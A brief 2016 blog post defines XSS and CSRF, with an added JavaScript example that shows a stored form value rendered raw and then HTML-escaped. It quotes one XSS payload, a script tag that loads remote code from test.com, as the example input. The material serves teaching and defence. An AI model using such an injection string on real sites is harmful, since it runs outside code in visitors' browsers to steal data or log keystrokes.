
Oct 8, 2016

XSS attack and CSRF attack

Cross-Site Scripting (XSS)

XSS is a code injection attack. The attacker tries to get code they control displayed in the target site. If the target site allows HTML characters in a form field, the attacker can enter a value like "Something<script type="text/javascript" src="http://www.test.com/script.js"></script>". When this field is later displayed in a page, the script runs too. Someone can use this script to grab sensitive information, log keystrokes, etc.
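The following is an added example, not code from the original post: it renders the form-field value quoted above once by plain concatenation and once with HTML output encoding, so the difference is visible in the generated markup. The function names (escapeHtml, renderFieldUnsafe, renderFieldSafe, containsScriptTag) and the surrounding <p> markup are assumptions made for illustration.

```javascript
// Constructed sample input: the form-field value quoted in the text above.
const storedField =
  'Something<script type="text/javascript" src="http://www.test.com/script.js"></script>';

// Characters that carry meaning in HTML text and quoted attribute values.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode a value so the browser displays it as text instead of parsing it as markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering (hypothetical): the stored field is concatenated into
// the page as-is, so the <script> element becomes part of the document.
function renderFieldUnsafe(field) {
  return '<p class="comment">' + field + '</p>';
}

// Hardened rendering (hypothetical): the field is encoded at output time,
// so the same input is shown to the reader as literal characters.
function renderFieldSafe(field) {
  return '<p class="comment">' + escapeHtml(field) + '</p>';
}

// Simple check usable in a unit test: does the generated HTML contain a
// script tag that the browser would parse?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe:', renderFieldUnsafe(storedField));
console.log('  live script tag?', containsScriptTag(renderFieldUnsafe(storedField)));
console.log('safe:  ', renderFieldSafe(storedField));
console.log('  live script tag?', containsScriptTag(renderFieldSafe(storedField)));
```

This encoding is only correct for HTML body text and quoted attribute values; values placed inside a script block, a URL, or CSS need the encoding for that context.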

Cross-Site Request Forgery (CSRF)

This is also known as a one-click attack or session riding. It is a form of attack in which an authenticated user performs an action on a site without knowing it.

